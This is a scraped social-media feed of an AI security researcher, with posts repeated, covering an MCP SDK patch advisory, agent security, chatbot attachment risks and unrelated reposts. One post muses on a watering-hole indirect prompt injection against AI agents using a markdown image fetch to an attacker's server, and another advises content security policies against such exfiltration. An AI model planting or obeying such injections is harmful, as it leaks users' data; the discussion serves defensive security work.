Rich Harang
@rich.harang.org
Using bad guys to catch math since 2010.
Principal Security Architect (AI/ML) and AI Red Team at NVIDIA.
He/him. Personal account etc; `from std_disclaimers import *`
Safe AI starts with Secure AI.
Principal Security Architect (AI/ML) and AI Red Team at NVIDIA.
He/him. Personal account etc; `from std_disclaimers import *`
Safe AI starts with Secure AI.
If you're building internet-facing services on the MCP Python SDK, update to >= 1.10.0 at your earliest convenience. Fixes two unauthenticated network DoS issues (CVSS 8.7) in <1.9.4 and <1.10.0, respectively.
nvd.nist.gov/vuln/detail/...
nvd.nist.gov/vuln/detail/...
nvd.nist.gov/vuln/detail/...
nvd.nist.gov/vuln/detail/...
July 7, 2025 at 12:28 PM
If you're building internet-facing services on the MCP Python SDK, update to >= 1.10.0 at your earliest convenience. Fixes two unauthenticated network DoS issues (CVSS 8.7) in <1.9.4 and <1.10.0, respectively.
nvd.nist.gov/vuln/detail/...
nvd.nist.gov/vuln/detail/...
nvd.nist.gov/vuln/detail/...
nvd.nist.gov/vuln/detail/...
"Give me your tired, your poor / Your huddled masses yearning to breathe free / The wretched refuse of your teeming shore / Send these, the homeless, tempest-tossed to me..."
Also: "Truly I tell you, whatever you did for one of the least of these brothers and sisters of mine, you did for me."
Also: "Truly I tell you, whatever you did for one of the least of these brothers and sisters of mine, you did for me."
July 4, 2025 at 10:47 PM
"Give me your tired, your poor / Your huddled masses yearning to breathe free / The wretched refuse of your teeming shore / Send these, the homeless, tempest-tossed to me..."
Also: "Truly I tell you, whatever you did for one of the least of these brothers and sisters of mine, you did for me."
Also: "Truly I tell you, whatever you did for one of the least of these brothers and sisters of mine, you did for me."
If you insist on taking LLM output and rendering it via markdown, at least use image content security policies; it's not perfect for preventing exfiltration but it'll at least make them work for it.
July 1, 2025 at 9:32 PM
If you insist on taking LLM output and rendering it via markdown, at least use image content security policies; it's not perfect for preventing exfiltration but it'll at least make them work for it.
"AI-powered VScode fork" is the new "ChatGPT wrapper" change my view.
June 12, 2025 at 2:07 PM
"AI-powered VScode fork" is the new "ChatGPT wrapper" change my view.
Shower thought: the one-two punch of raw empiricism combined with 'state of the art' chasing for AI academic work has diverted a lot of research into pure emprical performance tuning that might have been better spent on theoretical work.
June 11, 2025 at 11:33 PM
Shower thought: the one-two punch of raw empiricism combined with 'state of the art' chasing for AI academic work has diverted a lot of research into pure emprical performance tuning that might have been better spent on theoretical work.
Thought experiment: if you were going to set up a watering hole attack for indirect prompt injections against unknown agents, where would you do it and what sort of injections would you try?
I'm not sure about where/how, but a markdown image fetch to a server I control feels like the right payload.
I'm not sure about where/how, but a markdown image fetch to a server I control feels like the right payload.
June 6, 2025 at 8:41 PM
Thought experiment: if you were going to set up a watering hole attack for indirect prompt injections against unknown agents, where would you do it and what sort of injections would you try?
I'm not sure about where/how, but a markdown image fetch to a server I control feels like the right payload.
I'm not sure about where/how, but a markdown image fetch to a server I control feels like the right payload.
Just constantly asking "what does the bottom turtle look like?" these days.
June 6, 2025 at 1:09 PM
Just constantly asking "what does the bottom turtle look like?" these days.
Meanwhile, on Twitter (not "X"; their words not mine)....
(From quick inspection: mostly crypto + telegram scams -- this is about a week's worth)
(From quick inspection: mostly crypto + telegram scams -- this is about a week's worth)
![Screenshot of a gmail inbox showing approximately 20 email's of the form "[Person] has added you to a group conversation on Twitter!"](https://cdn.bsky.app/img/feed_thumbnail/plain/did:plc:xvzmaufbl63npctyzvtm7zem/bafkreifq3tkosus27yko3lfoczfsvljf3ot5lax3njm5nl7hottz2ngobi@jpeg)
May 27, 2025 at 12:57 PM
Meanwhile, on Twitter (not "X"; their words not mine)....
(From quick inspection: mostly crypto + telegram scams -- this is about a week's worth)
(From quick inspection: mostly crypto + telegram scams -- this is about a week's worth)
If you're interested in the security of agentic systems, you're not going to want to miss this talk. @beccalunch.bsky.social will present NVIDIA AI Red Team findings in real world agentic systems, and I'll talk about how the AI Security team helps mitigate them.
www.blackhat.com/us-25/briefi...
www.blackhat.com/us-25/briefi...
Black Hat
Black Hat
www.blackhat.com
May 19, 2025 at 8:56 PM
If you're interested in the security of agentic systems, you're not going to want to miss this talk. @beccalunch.bsky.social will present NVIDIA AI Red Team findings in real world agentic systems, and I'll talk about how the AI Security team helps mitigate them.
www.blackhat.com/us-25/briefi...
www.blackhat.com/us-25/briefi...
Here's the thing: You probably already have "Computer Use Agents" running on your corporate machines, with all of the _insane_ enterprise risks they entail. We're just calling them "IDEs" for some reason.
May 14, 2025 at 11:58 AM
Here's the thing: You probably already have "Computer Use Agents" running on your corporate machines, with all of the _insane_ enterprise risks they entail. We're just calling them "IDEs" for some reason.
If you're not aware: the MCP inspector tool is a great one to have in your back pocket for poking around MCP servers looking for weaknesses.
modelcontextprotocol.io/docs/tools/i...
modelcontextprotocol.io/docs/tools/i...
Inspector - Model Context Protocol
In-depth guide to using the MCP Inspector for testing and debugging Model Context Protocol servers
modelcontextprotocol.io
May 3, 2025 at 12:38 PM
If you're not aware: the MCP inspector tool is a great one to have in your back pocket for poking around MCP servers looking for weaknesses.
modelcontextprotocol.io/docs/tools/i...
modelcontextprotocol.io/docs/tools/i...
Reposted by Rich Harang
A friend with a Pixel 9 (Android 15) cannot figure out how to turn off Google’s AI suggestion features, which are even colonizing Signal. They’ve tried every switch they can find. Any ideas?
May 2, 2025 at 12:22 AM
A friend with a Pixel 9 (Android 15) cannot figure out how to turn off Google’s AI suggestion features, which are even colonizing Signal. They’ve tried every switch they can find. Any ideas?
I think I've said this before, but the one AI risk I now believe that I was genuinely miscalibrated on was how readily people form social attachments to chatbots. Optimizing them for sustained engagement seems likely to be -incredibly- corrosive to the mental health of a nontrivial number of people.
May 1, 2025 at 11:47 AM
I think I've said this before, but the one AI risk I now believe that I was genuinely miscalibrated on was how readily people form social attachments to chatbots. Optimizing them for sustained engagement seems likely to be -incredibly- corrosive to the mental health of a nontrivial number of people.
Reposted by Rich Harang
Reposted by Rich Harang
Randomly remembered the saddest thing online
SocialAI - Your Personal AI-Powered Social Network | Be the Main Character
Experience SocialAI, your personal and private AI-powered social network. Create your own exclusive network with millions of AI followers responding to your every post.
socialai.co
May 1, 2025 at 2:29 AM
Randomly remembered the saddest thing online
Reposted by Rich Harang
It’s funny because it’s true
April 30, 2025 at 3:25 PM
It’s funny because it’s true
Tapping the "Models give you what you ask for, not what you want" sign yet again.
April 30, 2025 at 4:50 PM
Tapping the "Models give you what you ask for, not what you want" sign yet again.
Reposted by Rich Harang
my idiot best friend has cancer and told me to reskeet this and since she has cancer I have to do it
she said that to me at a dinner
but for real, it's a good read and maybe if you're having weird stuff happening in your ass you should go get checked just in case
she said that to me at a dinner
but for real, it's a good read and maybe if you're having weird stuff happening in your ass you should go get checked just in case
April 22, 2025 at 9:36 PM
my idiot best friend has cancer and told me to reskeet this and since she has cancer I have to do it
she said that to me at a dinner
but for real, it's a good read and maybe if you're having weird stuff happening in your ass you should go get checked just in case
she said that to me at a dinner
but for real, it's a good read and maybe if you're having weird stuff happening in your ass you should go get checked just in case
I was planning on writing another "how to write a good submission" post at some point once the current review season is over (why is the spring always so crazy?), but at this point I think my number 1 suggestion would be "actually complete your submission. like all of it. actually finish."
April 19, 2025 at 1:27 PM
I was planning on writing another "how to write a good submission" post at some point once the current review season is over (why is the spring always so crazy?), but at this point I think my number 1 suggestion would be "actually complete your submission. like all of it. actually finish."